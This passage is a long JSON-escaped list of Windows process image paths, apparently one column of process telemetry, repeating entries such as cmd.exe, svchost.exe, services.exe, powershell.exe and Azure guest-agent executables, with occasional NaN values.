\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\